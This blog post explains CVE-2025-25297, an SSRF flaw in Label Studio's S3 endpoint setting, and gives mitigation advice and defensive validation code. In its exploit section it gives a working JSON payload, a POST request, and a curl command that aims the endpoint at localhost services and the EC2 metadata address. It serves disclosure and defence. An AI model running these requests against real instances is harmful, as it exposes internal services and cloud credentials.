Label Studio is a popular open-source data annotation tool used across industries for processing machine learning datasets. In early 2025, a severe vulnerability was found in its S3 storage integration that allowed attackers to reach internal resources through a classic Server-Side Request Forgery (SSRF) technique. This post breaks down CVE-2025-25297: what it means, how it works, and how attackers could exploit it, with code snippets and mitigation advice.
TL;DR: What Happened?
- Label Studio before version 1.16.0 lets users define a custom S3 endpoint (via the s3_endpoint parameter) with *no* validation.
- The software blindly hands the endpoint to boto3, the AWS Python SDK.
- This allows attackers to make requests to any HTTP service the server can reach, including *internal* services, bypassing normal network rules.
- If the request fails, Label Studio even returns detailed error messages with response bodies, which can leak sensitive information.
- The issue is patched in Label Studio 1.16.0. See the official GitHub security advisory for details.
How SSRF Works in Label Studio
Label Studio’s S3 integration is designed to connect to a _cloud storage_ system, like Amazon S3, for managing assets. However, it lets you specify *any* endpoint, not just a valid S3 service. Here’s the typical workflow and the dangerous twist:
- No blocking of protocols or target domains: Label Studio does not check whether the URL is safe, whether it uses HTTP instead of HTTPS, or whether it points to 127.0.0.1 or another localhost address.
- Requests are made to attacker-controlled or internal destinations: when you sync data, Label Studio’s server tries to use the endpoint, exposing whatever services are addressable from the server. Failed requests produce detailed error messages.
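To make the missing checks concrete, here is a minimal sketch of how an endpoint string could be classified before it is used. This is not Label Studio's actual code: the helper name `classify_endpoint` and its labels are hypothetical, and it inspects only the URL text. It performs no DNS resolution, so a hostname that points at an internal IP would still need a check at resolution time.

```python
import ipaddress
from urllib.parse import urlparse


def classify_endpoint(url: str) -> str:
    """Return a coarse risk label for a user-supplied endpoint URL.

    Hypothetical helper for illustration only; it looks at the URL text
    and does not resolve DNS names.
    """
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https"):
        return "unsupported-scheme"
    host = parsed.hostname
    if not host:
        return "missing-host"
    if host == "localhost" or host.endswith(".localhost"):
        return "loopback"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        # Not an IP literal: a DNS name whose resolved address still needs checking.
        return "hostname"
    if ip.is_loopback:
        return "loopback"
    if ip.is_link_local:
        return "link-local"  # e.g. 169.254.169.254, the cloud metadata address
    if ip.is_private:
        return "private"
    return "public-ip"


for candidate in (
    "http://127.0.0.1:800/private-admin",
    "http://localhost:808/metadata",
    "http://169.254.169.254/latest/meta-data/",
    "http://10.0.0.5/",
    "https://s3.amazonaws.com",
):
    print(candidate, "->", classify_endpoint(candidate))
```

Every target except the last one is something a storage integration has no reason to contact, yet none of them is rejected by the vulnerable versions.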
Imagine the underlying Python code in Label Studio (simplified for clarity):
```python
import boto3


def create_s3_connection(access_key, secret_key, s3_endpoint):
    # s3_endpoint is user-controlled!
    s3 = boto3.client(
        's3',
        aws_access_key_id=access_key,
        aws_secret_access_key=secret_key,
        endpoint_url=s3_endpoint
    )
    return s3
```
The issue: endpoint_url=s3_endpoint is fully trusted, so if a user sets this to http://localhost:808/internal-api, boto3 will send requests to that address from inside the server’s network, even if it is an admin panel, a metadata API, or something else sensitive.
Exploit Path: How an Attacker Abuses This Vulnerability
Let’s say, as an attacker, you have access (directly, via an XSS attack, or through leaked credentials) to create a new S3 storage source in a public or shared Label Studio instance.
Point the endpoint at an internal service:
```json
{
  "s3_endpoint": "http://127.0.0.1:800/private-admin"
}
```
Read the error response:
If the local server responds (even with an error), Label Studio returns the full response body in the error message! If the internal service leaks secrets, keys, or system information, you get that data.
Request
```
POST /api/storages/s3/new
Content-Type: application/json

{
  "title": "Attack Storage",
  "bucket": "not-needed",
  "s3_endpoint": "http://localhost:808/metadata"
}
```
Resulting error message
```json
{
  "detail": "Error from S3: <html><body><h1>Metadata Service</h1>...</body></html>"
}
```
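One way to avoid leaking response bodies like the one above is to log the full failure on the server and return only a generic message to the client. The following is a minimal sketch of that idea, not Label Studio's actual fix; the helper name `safe_storage_error`, the logger name, and the payload fields are assumptions made for illustration.

```python
import logging
import uuid

logger = logging.getLogger("storage")


def safe_storage_error(exc: Exception) -> dict:
    """Build an API error payload that omits the upstream response body.

    Hypothetical helper: the full exception is logged server-side under a
    correlation ID, and the client receives only a generic message.
    """
    error_id = uuid.uuid4().hex
    logger.error("storage connection failed [%s]: %r", error_id, exc)
    return {
        "detail": "Could not connect to the configured storage endpoint.",
        "error_id": error_id,
    }


# Simulate an upstream failure whose message embeds an internal response body.
leaky = RuntimeError(
    "Error from S3: <html><body><h1>Metadata Service</h1></body></html>"
)
payload = safe_storage_error(leaky)
print(payload["detail"])
```

The correlation ID lets an administrator find the detailed log entry without exposing the internal service's output to whoever triggered the request.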
- No elevated privileges required: if the Label Studio instance is publicly accessible, or you are a lower-privilege user, you can exploit this with just API access.
- Information leakage: error messages include response bodies, so attackers can extract internal secrets from the error text (think cloud metadata services, Kubernetes admin endpoints, or internal admin panels).
You can use curl to simulate an attack (replace LABEL_STUDIO_URL and API_TOKEN):
```shell
curl -H "Authorization: Token API_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"bucket":"x","s3_endpoint":"http://169.254.169.254/latest/meta-data/","title":"SSRF"}' \
  https://LABEL_STUDIO_URL/api/storages/s3/new
```
If the instance is vulnerable, the response may include data from the *Amazon EC2 instance metadata service*, potentially including environment secrets.
References
- GitHub Security Advisory – Label Studio (CVE-2025-25297)
- Label Studio Release Notes 1.16.0
- Boto3 Documentation – client()
- OWASP SSRF Cheat Sheet
Mitigation
- Upgrade immediately to Label Studio 1.16.0 or later.
- Firewall instances that have sensitive network access, and avoid exposing admin interfaces publicly.
- Validate and restrict user-provided endpoints rigorously in *any* application that must interact with custom URLs.
- If you maintain a fork or plugin for Label Studio, check if you have similar exposure points in your code.
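The endpoint-validation advice above can be sketched as follows. This is a minimal example under stated assumptions, not the patch shipped in Label Studio: the function names `validate_s3_endpoint` and `resolve_host` are hypothetical, and the allowlist assumes a deployment that only needs AWS-hosted S3. The resolver is passed in as a parameter so the check can be exercised without network access.

```python
import ipaddress
import socket
from urllib.parse import urlparse

# Assumption: only AWS-hosted S3 is needed; adjust for your own providers.
ALLOWED_HOST_SUFFIXES = (".amazonaws.com",)


def resolve_host(host):
    """Resolve a hostname to a list of IP address strings via the system resolver."""
    infos = socket.getaddrinfo(host, None, proto=socket.IPPROTO_TCP)
    return [info[4][0] for info in infos]


def validate_s3_endpoint(url, resolver=resolve_host):
    """Return the URL if it passes all checks, otherwise raise ValueError."""
    parsed = urlparse(url)
    if parsed.scheme != "https":
        raise ValueError("endpoint must use https")
    host = parsed.hostname or ""
    if not host.endswith(ALLOWED_HOST_SUFFIXES):
        raise ValueError("endpoint host is not on the allowlist")
    for address in resolver(host):
        # Reject loopback, private, link-local, and other non-public ranges.
        if not ipaddress.ip_address(address).is_global:
            raise ValueError(f"endpoint resolves to a non-public address: {address}")
    return url


# Usage with stub resolvers so the example runs without network access.
print(validate_s3_endpoint(
    "https://s3.us-east-1.amazonaws.com", resolver=lambda host: ["52.216.0.1"]
))
for bad in ("http://s3.amazonaws.com", "https://localhost:808/metadata"):
    try:
        validate_s3_endpoint(bad, resolver=lambda host: ["127.0.0.1"])
    except ValueError as err:
        print("rejected:", bad, "-", err)
```

Note that validating at configuration time does not by itself stop DNS rebinding, where a hostname resolves to a different address when the request is actually made. Network-level egress rules remain a useful second layer.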
Conclusion
CVE-2025-25297 shines a light on the dangers of trusting user-supplied endpoints in cloud integrations. If you're running Label Studio, update now, review your logs, and always treat “custom endpoint” functionality as a high-value target in your threat model.
If you want tailored advice on securing your ML pipelines, or need help setting internal firewalls properly, drop a comment or contact security pros for an audit.
Stay safe!
*This post was written exclusively for educational and awareness purposes. Always test ethically and with permission.*
Timeline
Published on: 02/14/2025 20:15:36 UTC